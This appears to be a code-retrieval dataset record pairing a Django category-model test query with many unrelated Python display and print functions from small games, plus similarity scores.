\"RUN!\"\\n')\n sleep(2)\n print(f'\"{player[\"Name\"][0]}, go find the TARDIS, she\\'ll protect you!\" the DOCTOR whispered quickly\\n'\n f'and ran off. \"DOCTOR! Wait!\" {player[\"Name\"][0]} angrily grumbled, \"Damn he runs fast.\"\\n'\n f'Hopefully they don\\'t run into any monster as they look for that blue police box.\\n')\n sleep(2)\n print(board[(0, 4)][\"Plot\"])", "def Draw(self):\n print ( 10*\"*\")\n print (\"Player \" + self.character + \" says:\")\n print (\"It's a Draw\")\n print ( 10*\"*\")", "def lobby_screen_pick_deck_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2):\n # Pick deck text\n button_text_1 = Button('Pick an exist deck or create a new one: ','', (250,250,250),400, 100, 400, 35, font_color = (0,0,0), alpha = 150)\n button_text_1.update()\n button_text_1.draw(screen)\n\n # Deck list buttons\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n if len(f.readlines()) >= 12:\n pass\n else:\n button_new_deck = Button('+ New Deck','', (250,250,250),1020, 110, 120, 35, font_color = (0,0,0), alpha = 150)\n button_new_deck.update()\n button_new_deck.draw(screen)\n\n\n f.seek(0)\n x = len(f.readlines())\n y = 0\n deck_list_index = 0\n\n for i in range(1,7):\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) not in line:\n y += 1\n if y < x: # DECK_LIST_i exist\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) in line:\n deck_length = len(make_card_list_from_string(line.replace('DECK_LIST_' + str(i) + ' = ', ''), ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2))\n # deck_length = int((len(line.replace('DECK_LIST_' + str(i) + ' = ', '')) -1)/14)\n if 'CHARACTER_' + str(i) in line:\n character_length = 1\n character_card = eval('card_' + line.replace('CHARACTER_' + str(i) + ' = ', '')[7:12])\n\n if user.deck_list_index == str(i):\n\n button_top = Button(character_card.name + ': ','', (100,30,130),85 + 180* (i-1), 165, 130, 60)\n button_top.update()\n button_top.draw(screen)\n\n if deck_length < 40:\n button_bottom = Button(str(character_length) + '/1 | ' + str(deck_length) +'/40','', (100,30,130),85 + 180* (i-1), 225, 130, 50, font_color = (250,0,0))\n button_bottom.update()\n button_bottom.draw(screen)\n else:\n button_bottom = Button(str(character_length) + '/1 | ' + str(deck_length) +'/40','', (100,30,130),85 + 180* (i-1), 225, 130, 50)\n button_bottom.update()\n button_bottom.draw(screen)\n\n else:\n\n button_top = Button(character_card.name + ': ','', (160,160,160),85 + 180* (i-1), 165, 130, 60, alpha = 240)\n button_top.update()\n button_top.draw(screen)\n\n if deck_length < 40:\n button_bottom = Button(str(character_length) + '/1 | ' + str(deck_length) +'/40','', (160,160,160),85 + 180* (i-1), 225, 130, 50, font_color = (200,0,0), alpha = 240)\n button_bottom.update()\n button_bottom.draw(screen)\n else:\n button_bottom = Button(str(character_length) + '/1 | ' + str(deck_length) +'/40','', (160,160,160),85 + 180* (i-1), 225, 130, 50, alpha = 240)\n button_bottom.update()\n button_bottom.draw(screen)\n\n y = 0\n\n else: # DECK_LIST_i not exist\n\n button = Button('Empty','', (200,200,200),85 + 180* (i-1), 165, 130, 110, alpha = 80)\n button.update()\n button.draw(screen)\n\n y = 0\n\n\n for i in range(1,7):\n if user.deck_list_index == str(i):\n button_edit = Button('Edit','', (50,50,170),85 + 180* (i-1), 282, 60, 30)\n button_edit.update()\n button_edit.draw(screen)\n\n button_delete = Button('Delete','', (160,30,30), 155 + 180* (i-1), 282, 60, 30)\n button_delete.update()\n button_delete.draw(screen)", "def battle_screen_my_hand_button_display(screen,buttons, screen_status, button_status, card_database_filter, user):\n if screen_status.battle_screen_action_indicator != 'stage-0':\n # Page forward button\n button1 = Button('>','', (0,0,0),1100, 660, 50, 50)\n # Edge cases when len() = 14,28,42 ...\n if len(user.hand_list) % 7 == 0 and len(user.hand_list) != 0:\n if screen_status.battle_screen_my_hand_page_id != ((len(user.hand_list))//7): # Make sure on the last page no foreward button shows up\n button1.update()\n button1.draw(screen)\n # Normal cases\n else:\n if screen_status.battle_screen_my_hand_page_id != ((len(user.hand_list))//7 + 1): # Make sure on the last page no foreward button shows up\n button1.update()\n button1.draw(screen)\n # Page backward button\n button2 = Button('<', '' ,(0,0,0),50, 660, 50, 50)\n if screen_status.battle_screen_my_hand_page_id != 1: # Make sure on the first page no backward button shows up\n button2.update()\n button2.draw(screen)\n #\n if button_status.battle_screen_my_hand_page_change_button_backend:\n buttons.extend((button1,button2))\n button_status.battle_screen_my_hand_page_change_button_backend = False\n if ((screen_status.battle_screen_action_indicator == 'stage-1-level-up'\n or ('stage-2-character-action-' in screen_status.battle_screen_action_indicator and 'detail' in screen_status.battle_screen_action_indicator)\n or 'stage-2-other-action-detail-spawn' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-think-fast' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-equip' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-sneak' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-tactic-1' in screen_status.battle_screen_action_indicator)\n and (screen_status.battle_screen_player2_action_display_indicator == False)):\n if button_status.battle_screen_my_hand_indicator_display == True:\n located_card = user.hand_list[7*(screen_status.battle_screen_my_hand_page_id - 1)+(int(button_status.battle_screen_my_hand_indicator_position)-1)]\n\n button_top = Button('','', (250,0,0),located_card.rect.x-5, located_card.rect.y - 5, 140, 5)\n button_top.update()\n button_top.draw(screen)\n\n button_bottom = Button('','', (250,0,0),located_card.rect.x-5, located_card.rect.y + 180, 140, 5)\n button_bottom.update()\n button_bottom.draw(screen)\n\n button_left = Button('','', (250,0,0),located_card.rect.x-5, located_card.rect.y, 5, 180)\n button_left.update()\n button_left.draw(screen)\n\n button_right = Button('','', (250,0,0),located_card.rect.x + 130, located_card.rect.y , 5, 180)\n button_right.update()\n button_right.draw(screen)\n # button_level_up = Button('***','battle_screen_handaction_****', (70,70,150),located_card.rect.x+10, located_card.rect.y - 27, 115, 27)\n # button_level_up.update()\n # button_level_up.draw(screen)", "def show_greeting(self):\n self.output(' ------------------------ ')\n self.output('You are now playing ' + self.name)\n self.output(self.greeting)\n self.output(' ------------------------ ')", "def lobby_screen_room_detail_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2):\n\n if button_status.lobby_screen_room_detail_display == 'none':\n\n if button_status.lobby_screen_room_list_display == 'N/A':\n button5 = Button('Create a game:','', (0,0,0),400, 580, 400, 50, font_size = 20, alpha = 0)\n button5.update()\n button5.draw(screen)\n\n button3 = Button('CREATE','', (40,40,120),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n else:\n button5 = Button('Please join the existing game!','', (0,0,0),400, 580, 400, 50, font_size = 20, alpha = 0)\n button5.update()\n button5.draw(screen)\n\n\n\n elif button_status.lobby_screen_room_detail_display == 'my':\n\n if button_status.lobby_screen_room_status == '1/2':\n button5 = Button(user.name + \"'s game:\" + ' 1/2','', (0,0,0),400, 580, 400, 50, font_size = 20,font_color = (200,100,100), alpha = 0)\n button5.update()\n button5.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n button5 = Button(user.name + \"'s game:\" + ' 2/2','', (0,0,0),400, 580, 400, 50, font_size = 20, alpha = 0)\n button5.update()\n button5.draw(screen)\n\n if button_status.lobby_screen_my_ready_to_go == False:\n button3 = Button(user.name,'', (200,200,110),205, 635, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_my_ready_to_go == True:\n button3 = Button(user.name,'', (110,200,110),205, 635, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n if button_status.lobby_screen_room_status == '1/2':\n button3 = Button('Empty','', (250,250,250),205, 680, 650, 35,alpha = 100)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n if button_status.lobby_screen_other_ready_to_go == False:\n button3 = Button(player2.name,'', (200,200,110),205, 680, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_other_ready_to_go == True:\n button3 = Button(player2.name,'', (110,200,110),205, 680, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n if button_status.lobby_screen_prepare_to_go_display == False:\n if button_status.lobby_screen_room_status == '1/2':\n button3 = Button('NEXT','', (120,120,120),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n button3 = Button('NEXT','', (40,120,40),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n else:\n if button_status.lobby_screen_my_ready_to_go == False:\n\n button3 = Button('READY!','', (40,120,40),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n elif button_status.lobby_screen_my_ready_to_go == True:\n if button_status.lobby_screen_other_ready_to_go == True:\n button3 = Button('PLAY!','', (247, 201, 37),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_other_ready_to_go == False:\n button3 = Button('WAIT!','', (40, 40, 120),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n\n button3 = Button('QUIT','', (120,40,40),920, 684, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n elif button_status.lobby_screen_room_detail_display == 'other':\n\n if button_status.lobby_screen_room_status == '1/2':\n button5 = Button(player2.name + \"'s game:\" + ' 1/2','', (0,0,0),400, 580, 400, 50, font_size = 20,font_color = (200,100,100), alpha = 0)\n button5.update()\n button5.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n button5 = Button(player2.name + \"'s game:\" + ' 2/2','', (0,0,0),400, 580, 400, 50, font_size = 20, alpha = 0)\n button5.update()\n button5.draw(screen)\n\n if button_status.lobby_screen_my_ready_to_go == False:\n button3 = Button(player2.name,'', (200,200,110),205, 635, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_my_ready_to_go == True:\n button3 = Button(player2.name,'', (110,200,110),205, 635, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n\n if button_status.lobby_screen_room_status == '1/2':\n button3 = Button('Empty','', (250,250,250),205, 680, 650, 35,alpha = 100)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n\n if button_status.lobby_screen_other_ready_to_go == False:\n button3 = Button(user.name,'', (200,200,110),205, 680, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_other_ready_to_go == True:\n button3 = Button(user.name,'', (110,200,110),205, 680, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n if button_status.lobby_screen_prepare_to_go_display == True:\n if button_status.lobby_screen_other_ready_to_go == False:\n button3 = Button('READY!','', (40,120,40),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_other_ready_to_go == True:\n button3 = Button('WAIT...','', (40,40,120),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n button3 = Button('QUIT','', (120,40,40),920, 684, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)", "def battle_screen_battleground_button_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2):\n if ('stage-2-other-action-detail-tactic-1' in screen_status.battle_screen_action_indicator\n or ('stage-2-character-action-' in screen_status.battle_screen_action_indicator and '-detail-tactic-1' in screen_status.battle_screen_action_indicator)\n or ('stage-2-character-action-' in screen_status.battle_screen_action_indicator and 'easy-shot' in screen_status.battle_screen_action_indicator)\n or ('stage-2-character-action-' in screen_status.battle_screen_action_indicator and 'tricky-shot' in screen_status.battle_screen_action_indicator)\n or 'stage-3-monster-' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-easy-shot' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-tricky-shot' in screen_status.battle_screen_action_indicator\n ):\n if button_status.battle_screen_player1_battleground_indicator_display == True:\n if int(button_status.battle_screen_player1_battleground_indicator_position) <= 3:\n i = int(button_status.battle_screen_player1_battleground_indicator_position)\n monster_rect_x = 650\n monster_rect_y = 220 + 110*(i-1)\n button = Button('***','', (70,70,150),monster_rect_x + 50, monster_rect_y - 27, 30, 27)\n button.update()\n button.draw(screen)\n elif int(button_status.battle_screen_player1_battleground_indicator_position) <= 6:\n i = int(button_status.battle_screen_player1_battleground_indicator_position)\n monster_rect_x = 825\n monster_rect_y = 220 + 110*(i-4)\n button = Button('***','', (70,70,150),monster_rect_x + 50, monster_rect_y - 27, 30, 27)\n button.update()\n button.draw(screen)\n\n if button_status.battle_screen_player2_battleground_indicator_display == True:\n if int(button_status.battle_screen_player2_battleground_indicator_position) <= 3:\n i = int(button_status.battle_screen_player2_battleground_indicator_position)\n monster_rect_x = 420\n monster_rect_y = 220 + 110*(i-1)\n button = Button('***','', (70,70,150),monster_rect_x + 50, monster_rect_y - 27, 30, 27)\n button.update()\n button.draw(screen)\n elif int(button_status.battle_screen_player2_battleground_indicator_position) <= 6:\n i = int(button_status.battle_screen_player2_battleground_indicator_position)\n monster_rect_x = 245\n monster_rect_y = 220 + 110*(i-4)\n button = Button('***','', (70,70,150),monster_rect_x + 50, monster_rect_y - 27, 30, 27)\n button.update()\n button.draw(screen)", "def display_hangman(self):\n print(Fore.CYAN + HANGMAN_PICS[self.stage])\n print('\\n')\n print(self.progress + Style.RESET_ALL)\n print('\\n')", "def info(msg):\n click.secho(msg, fg='blue')", "def print(self):\n for i in range(self.rows):\n print(\"--\" * self.cols + \"-\")\n for j in range(self.cols):\n cell = self.get_game_cell(i, j)\n if cell is None:\n print(f'({i} - {j}): failed')\n return None\n if cell.status == 'EMPTY':\n print(\"| \", end=\"\")\n else:\n print(f\"|{cell.status}\", end=\"\")\n print(\"|\")\n print(\"--\" * self.cols + \"-\")\n print(f\"Completed({self.completed}) - {self.winner}\")", "def is_button_output_present(self):\n self.wait_for_element_presence('div#ready', 'Page is Ready')\n self.q(css='div#fixture button').first.click()\n self.wait_for_element_presence('div#output', 'Button Output is Available')", "def show_messages(self):\n console.alert(\n \"Info\",\n \"If StaSh does not launch anymore after you changed the config, run the 'launch_stash.py' script with \\n'--no-cfgfile'.\",\n \"Ok\",\n hide_cancel_button=True,\n )\n while True:\n self.wait_modal()\n if not self.subview_open:\n break\n console.alert(\n \"Info\",\n \"Some changes may only be visible after restarting StaSh and/or Pythonista.\",\n \"Ok\",\n hide_cancel_button=True,\n )", "def main():\r\n future_student = \"Future begins\"\r\n print_message(future_student)\r\n print_message(\"Dreams begin\")\r\n print_message(\"Aspirations begin\")", "def print_banner(message):\n\n print(\"#############################################################################\")\n print(message)", "def show_result():\n print(\"I win!!\")", "def on_pushButton_clicked(self):\r\n # TODO: not implemented yet\r\n print 1", "def print_hands(self):\n # Clear the terminal and reprint round header\n os.system(\"clear\")\n self.print_header\n\n # Only display one of the dealers cards if they are still playing\n if not self.round_winner:\n print()\n print(\"Dealer's Cards\")\n print(\"=\" * 25)\n print(\"UNKNOWN\")\n for card in self.dealer.cards:\n if card != self.dealer.cards[0]:\n print(f\"{card.game_value} of {card.suit}\")\n print(\"-\"*25)\n print(\"TOTAL = ?\")\n print()\n\n print(\"Player's Cards\")\n print(\"=\" * 25)\n for card in self.player.cards:\n print(f\"{card.game_value} of {card.suit}\")\n print(\"-\" * 25)\n print(\"TOTAL = \" + str(self.player.sum_cards()))\n print()\n\n # Display the players cards and all of the dealers cards\n elif self.round_winner:\n print()\n print(\"Dealer's Cards\")\n print(\"=\" * 25)\n for card in self.dealer.cards:\n print(f\"{card.game_value} of {card.suit}\")\n print(\"-\" * 25)\n print(\"TOTAL = \" + str(self.dealer.sum_cards()))\n print()\n\n print(\"Player's Cards\")\n print(\"=\" * 25)\n for card in self.player.cards:\n print(f\"{card.game_value} of {card.suit}\")\n print(\"-\" * 25)\n print(\"TOTAL = \" + str(self.player.sum_cards()))\n print()\n pass", "def player_tie(self):\r\n\r\n self.summary = (\" \"* 78) + \"TIE. TRY AGAIN\"\r\n print(\"Match ends in a draw.\\n\")", "def continue_command(self):\n cycles_cont = self.on_spin_cont(wx.SpinCtrl)\n global global_cycles_completed\n # check that this function has been called on pressing continue button\n text = \"\".join(\n [_(u\"continue_command function has been called, number of cycles is: \"), str(cycles_cont)])\n if self.state == 0:\n self.canvas_2d.render(text, True)\n else:\n self.canvas_3d.render()\n if cycles_cont is not None: # if the number of cycles provided is valid\n if global_cycles_completed == 0:\n print(_(u\"Error! Nothing to continue. Run first.\"))\n elif self.run_network(cycles_cont):\n global_cycles_completed += cycles_cont\n print(\" \".join([_(u\"Continuing for\"), str(cycles_cont), _(u\"cycles.\"), _(u\"Total:\"), str(\n global_cycles_completed)]))", "def inform_players(list_of_players):\n for player in list_of_players:\n player.show_cards_beginning()\n input(\"Press enter to pass your turn\")\n print()", "def principle(self):\n self.main_window.message(\n bg=\"navy\", fg=\"ivory\", width=400, font=\"Helvetica 10 bold\",\n text=\"The pieces in this game each have one white and one black\"\n \" side. When you click on a piece, all 8 adjacent pieces turn\"\n \" over.\\nThe game consists of trying to turn them all over.\\n\"\n \"\\nIf the exercise is very easy with a 2 x 2 grid, it becomes\"\n \" more difficult with larger grids. It is even impossible with\"\n \" some grids.\\nIt's up to you to find out which ones!\\n\"\n \" Reference: 'Pour la Science' magazine\")", "def display_turn_text(self):\n if self.turn_display_timer > 0:\n self.turn_display_timer -= 1\n if self.turn_display_timer > 0:\n fill(1, 0, 0)\n textSize(self.WINDOW_SIZE//20)\n textAlign(CENTER)\n if self.player_turn is True:\n game_turn_text = \"Player Turn\"\n text(game_turn_text, self.WINDOW_SIZE/2, self.TEXT_OFFSET)\n elif self.player_turn is False:\n game_turn_text = \"OthelloAI Turn\"\n text(game_turn_text, self.WINDOW_SIZE/2, self.TEXT_OFFSET)", "def print_instructions(self):\n\t\tprint('\\n\\n==========================================================================')\n\t\tprint('==========================================================================\\n')\n\t\tprint('Welcome to Tic Tac Toe, the came you know and love. \\nThe rules are the same ones you know and love. \\nTo make a move just type the coordinates of the spot like so - row,column. \\nNo spaces please! Lets go ahead and start! Here is a picuter of the board with some coordinates just in case!\\n')\n\t\tprint('=====================')\n\t\tprint('|| 0,0 | 0,1 | 0,2 ||')\n\t\tprint(' -----------------')\n\t\tprint('|| 1,0 | 1,1 | 1,2 ||')\n\t\tprint(' -----------------')\n\t\tprint('|| 2,0 | 2,1 | 2,2 ||')\n\t\tprint('=====================')\n\t\tprint('\\n==========================================================================')\n\t\tprint('==========================================================================\\n\\n')", "def wait_for_button(self, button, message=True):\n if message:\n rospy.loginfo(\"Waiting for xbox button: \" + button)\n \n wait_for(lambda: not self.get_button(button) == 0)", "def print_fight_status():\n printmessage(\"You're fighting with a %s\" % ITEMS[0], 3, RED, 0)\n printmessage(\"You feel like you're %s\" % get_strength_text(STRENGTHVAL), 4, GREEN, 0)\n printmessage(\"The bear looks like he is %s\" % get_strength_text(BEARSTRENGTHVAL), 5, MAGENTA, 0)\n printmessage(\"Your food supply is %s\" % get_hunger_text(HUNGERVAL), 6, YELLOW, 0)", "def event_m20_11_x81():\n \"\"\"State 0,1: Prayer action\"\"\"\n PlayerActionRequest(6)\n assert (GetStateTime() > 4) != 0\n \"\"\"State 2: Dialog display: Nothing happened\"\"\"\n # action:1113:\"Alas, nothing happened\"\n DisplayOwnOkMenu(1113, 10, 0, 190, 0, 0, 0)\n \"\"\"State 3: End of prayer action\"\"\"\n EndPlayerActionRequest()\n \"\"\"State 4: End state\"\"\"\n return 0", "def play(self):\n print(\"Bientôt ! :)\")", "def printInstructions(self):\n print(\"\"\"•\tAim of the Game is to be the first to lose all of your chips\n•\tPlayers are put in order of the lowest to \nhighest based on their first roll\n(This is done automatically when you enter your name)\n• You start out with 5 chips.\n• When it is your turn you roll the die.\n\\t•\tIf the space with the same number as the die is empty (value of 0),\n\\t\\tput a chip there.\n\\t•\tbut if there already is a chip there (value of 1), you must take it.\n\\t•\tIf you roll a 6, you always put one of your chips on the space number 6 – \n\\t\\tregardless of how many chips are there already. \n\\t\\tChips on space number 6 are out of the game,\n\\t\\tand you never pick these up again.\n\"\"\")", "def printStep(self):\n\n\t\tprint '\\nConfiguracao da fita: ',\n\n\t\tcount = 0\n\t\twhile count < len(self.tape):\n\t\t\tif count == self.currentPos:\n\t\t\t\tprint '_',\n\n\t\t\tprint self.tape[count],\n\t\t\tcount += 1\n\n\t\tprint '\\nEstado atual: ', self.currentState", "def print_success_msg(msg):\n click.secho(msg, fg='green', file=sys.stdout)", "def outro():\n print('Tento remake vytvoril mirek sko súčasť svojich školení v rokoch 2022-2023.')\n print('Originálnu hru vytvoril v roku 1986 František Fuka aka Fuxoft.')\n print('See you soon.')", "def test_ProstateReporting1(self):\n\n self.delayDisplay(\"Starting the test\")\n\n self.delayDisplay('Test passed!')", "def build_deck_screen_stable_button_display(screen, buttons,screen_status,button_status):\n # button1 = Button('Back','build_deck_screen', (0,0,0),0, 0, 50, 50)\n # button1.update()\n # button1.draw(screen)\n button2 = Button('Save','build_deck_screen', (250,250,250),1150, 0, 50, 50, font_color = (0,0,0), alpha = 150)\n button2.update()\n button2.draw(screen)\n button3 = Button('Build your deck by picking 40 cards below: ', 'build_deck_screen', (250,250,250),300, 0, 600, 50, font_color = (0,0,0), alpha = 150)\n button3.update()\n button3.draw(screen)\n if button_status.build_deck_screen_stable_button_backend:\n buttons.extend((button2, button3))\n button_status.build_deck_screen_stable_button_backend = False", "def printStatus(self,mod=\"\"):\n dims = \"\"\n corner_labels = {\"back_right\":\"br\",\"back_left\":\"bl\",\"front_right\":\"fr\",\\\n \"front_left\":\"fl\"}\n for x in self.four_corners:\n dims += \"{}({},{}), \".format(corner_labels[x],self.four_corners[x][0],\\\n self.four_corners[x][1])\n print(\"{}{}\\tLEN: {}\\tLANES: ({},{})\".format(mod,\\\n self.label,round(self.length,2), self.top_up_lane.label,\\\n self.bottom_down_lane.label))\n print(\"{}{}\\t{}\\n\".format(mod,self.label,dims))", "def check_ready(self):\r\n print \"Checking ready\"\r\n\t\tif self.game.trough.is_full():\r\n print \"Ready\"\r\n\t\t\tself.ready()\r\n\t\t\treturn True\r\n\t\tprint \"Not Ready\"\r\n\t\treturn False", "def prompt_player(self):\n board = self.draw_board()\n print board\n self.player_moves(self.board_values)", "async def print_processor(self) -> None:\n try:\n while True:\n while self.print_queue.empty() is not True:\n stub = await self.print_queue.get()\n if isinstance(stub, str):\n print(stub)\n elif isinstance(stub, tuple):\n if stub[0] == \"error\":\n print(f\"{r}{stub[1]}{reset}\")\n elif stub[0] == \"warning\":\n print(f\"{y}{stub[1]}{reset}\")\n elif stub[0] == \"success\":\n print(f\"{g}{stub[1]}{reset}\")\n elif stub[0] == \"bold\":\n print(f\"{bold}{stub[1]}{reset}\")\n else:\n print(f\"{stub[1]}\")\n self.print_queue.task_done()\n await asyncio.sleep(0.002)\n except asyncio.CancelledError:\n print('Closing the RedCisco application... Cleaning up running tasks...\\n')" ]
[ "0.66662335", "0.6361344", "0.6316823", "0.6280809", "0.6178084", "0.6174785", "0.6170106", "0.613654", "0.61161566", "0.61064357", "0.6105633", "0.60992396", "0.6090242", "0.6024819", "0.6020871", "0.5997386", "0.5983832", "0.59802616", "0.59356964", "0.593354", "0.5915386", "0.59087473", "0.5908093", "0.590475", "0.5900574", "0.5892236", "0.5884856", "0.5874889", "0.5851253", "0.58500266", "0.5832663", "0.5821517", "0.5811647", "0.581077", "0.5810268", "0.58044815", "0.57990724", "0.57977", "0.5795472", "0.5790314", "0.5785214", "0.57846177", "0.5779526", "0.5777746", "0.5769675", "0.5768167", "0.5759663", "0.5749025", "0.57438606", "0.5732037", "0.5729812", "0.57221663", "0.5719263", "0.5713208", "0.57118225", "0.57047015", "0.5704197", "0.5698363", "0.56949097", "0.5688422", "0.5685752", "0.56842947", "0.56740266", "0.56683314", "0.56671965", "0.5665152", "0.5660065", "0.5656915", "0.5655009", "0.5653172", "0.56428057", "0.56407994", "0.5640728", "0.5640647", "0.56373674", "0.56320965", "0.5622394", "0.56119156", "0.56043094", "0.5596326", "0.5596032", "0.55957234", "0.5595171", "0.55939806", "0.5591642", "0.5587074", "0.5577026", "0.55759186", "0.5575224", "0.55707306", "0.5568193", "0.5565455", "0.55647534", "0.5563202", "0.55618787", "0.5561455", "0.55533564", "0.55525935", "0.5552032", "0.5549953", "0.5547615" ]
0.0
-1
Test Category model data insertion/types/field attributes
def test_category_model_entry(self): # PRUEBA DE CARGAR LA INFORMACION EN LOS MODELOS A TESTEAR data = self.data1 self.assertTrue(isinstance(data, Category)) # REALIZA EL TESTEO
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_category_model_entry(self):\n data = self.data1\n self.assertTrue(isinstance(data, Category))\n self.assertEqual(str(data), 'django')", "def test_create_category(self):\n pass", "def test_category_has_access_to_model_data():\n category = Category()\n category_data = category.get_category_data()\n\n assert type(category_data) is list\n assert len(category_data) > 1", "def test_category_model_entry(self):\n data = self.data1\n self.assertEqual(str(data), 'django')", "def test_update_category(self):\n pass", "def test_new_category_data(db_session):\n new_cat = Category(\n label=\"test_label\",\n desc=\"test_desc\"\n )\n db_session.add(new_cat)\n category = db_session.query(Category).all()\n assert category[0].label == \"test_label\"\n assert category[0].desc == \"test_desc\"", "def test_save(self, init_db):\n params = {\n 'name': fake.alphanumeric(15)\n }\n category = Category(**params)\n assert category == category.save()", "def test_create_category(self):\n payload = {\n 'name': 'Houses',\n }\n res = self.client.post(CATEGORY_URL, payload)\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n category = Category.objects.get(id=res.data['id'])\n serializer = CategorySerializer(category)\n self.assertEqual(serializer.data['name'], payload['name'])", "def test_category_save(database):\n category = Category(title=\"Test Category\")\n category.save()\n\n assert category.title == \"Test Category\"", "def test_create(self):\n self.assertTrue(Category.objects.exists())", "def test_create_cat_object():\n from .scripts.initializedb import create_cat_object\n cat_object = create_cat_object(\"a\", \"b\", \"c\", \"c\")\n assert isinstance(cat_object, Category)", "def test_model_string_representation(self, init_db, category):\n assert repr(category) == f'<Category: {category.name}>'", "def test_add_category(self):\n self.add_success(self.test_data['pants'])", "def test_add_category(self):\n self.signup('Bo', 'Theo', 'Bo_theo5@example.com', 'Bo1995', 'Bo1995')\n self.login('Bo_theo5@example.com', 'Bo1995')\n self.dashboard()\n rv = self.category('Breakfast')\n self.assertIn(b'Category created', rv.data)", "def test_create_recipe_category(self):\n self.signup('Bo', 'Theo', 'Bo_theo5@example.com', 'Bo1995', 'Bo1995')\n self.login('Bo_theo5@example.com', 'Bo1995')\n self.dashboard()\n self.category('JunkFood')\n self.dashboard()\n self.recipe_dashboard()\n rv = self.create_recipe('cakes', 'blah, blah, blah....mix ingredient, heat')\n self.assertIn(b'Recipe created', rv.data)", "def test_create_category(self):\n res = self.client().post('/categories/', data=self.category)\n self.assertEqual(res.status_code, 201)\n self.assertIn('Stews', str(res.data))", "def test_add_category_missing_fields(self):\n category = json.dumps({\n 'desc': \"Jamaican\",\n })\n response = self.client.post('/category', data=category,\n headers={\"Authorization\": self.token})\n self.assertEqual(response.status_code, 400)\n self.assertIn('Check the keys and try again', response.data.decode())", "def test_edit_recipe_category(self):\n self.signup('Bo', 'Theo', 'Bo_theo5@example.com', 'Bo1995', 'Bo1995')\n self.login('Bo_theo5@example.com', 'Bo1995')\n self.dashboard()\n self.category('JunkFood')\n self.dashboard()\n self.recipe_dashboard()\n self.create_recipe('cakes', 'blah, blah, blah....mix ingredient, heat')\n rv = self.edit_recipe('edited cakes', 'edited blah blah blah spoon , heat')\n self.assertIn(b'Recipe successfully updated', rv.data)", "def test_category_lowercase(self):\n self.assertEqual(self.category.category, \"test\")", "def test_update(self, init_db, category):\n category_name = fake.alphanumeric()\n category.update(name=category_name)\n assert category.name == category_name", "def test_category_mixed(self):\n self.go200('minus_upload')\n self.formfile('minus_upload', 'file', AUDIO_FILE)\n self.fv('minus_upload', 'categories', 'onecat')\n self.fv('minus_upload', 'add_category', 'yuppie')\n self.submit200()\n minus = MinusRecord.objects.all()[0]\n self.assert_equal(minus.categories.count(), 2)\n self.assert_equal(minus.categories.all()[0].name, 'onecat')\n self.assert_equal(minus.categories.all()[1].name, 'yuppie')", "def insert_data_category_into_bdd(self):\n for category in constant.LIST_CATEGORIES:\n data = Category(name=category)\n data.save()\n print(\"the category \" + str(category) + \" has been created\")", "def test_dashboard_recipe_created_with_category(self):\n self.signup('Bo', 'Theo', 'Bo_theo5@example.com', 'Bo1995', 'Bo1995')\n self.login('Bo_theo5@example.com', 'Bo1995')\n self.dashboard()\n self.category('JunkFood')\n self.dashboard()\n rv = self.recipe_dashboard()\n self.assertIn(b'JunkFood', rv.data)", "def test_get(self, init_db, category):\n assert Category.get(category.id) == category", "def test_edit_category(self):\n self.signup('Bo', 'Theo', 'Bo_theo5@example.com', 'Bo1995', 'Bo1995')\n self.login('Bo_theo5@example.com', 'Bo1995')\n self.dashboard()\n self.category('Breakfast')\n self.dashboard()\n rv = self.edit_category('JunkFood')\n self.assertIn(b'Category successfully updated', rv.data)", "def test_add_category_to_asset(self):\n pass", "def test_0005_create_categories(self):\n self.create_category(name='Test 0060 Workflow Features', description='Test 0060 - Workflow Features')", "def test_find_by_category(self):\n Pet(0, \"fido\", \"dog\").save()\n Pet(0, \"kitty\", \"cat\").save()\n pets = Pet.find_by_category(\"cat\")\n self.assertNotEqual(len(pets), 0)\n self.assertEqual(pets[0].category, \"cat\")\n self.assertEqual(pets[0].name, \"kitty\")", "def test_category_mixed_on_edit(self):\n self.go200('minus_upload')\n self.formfile('minus_upload', 'file', AUDIO_FILE)\n self.fv('minus_upload', 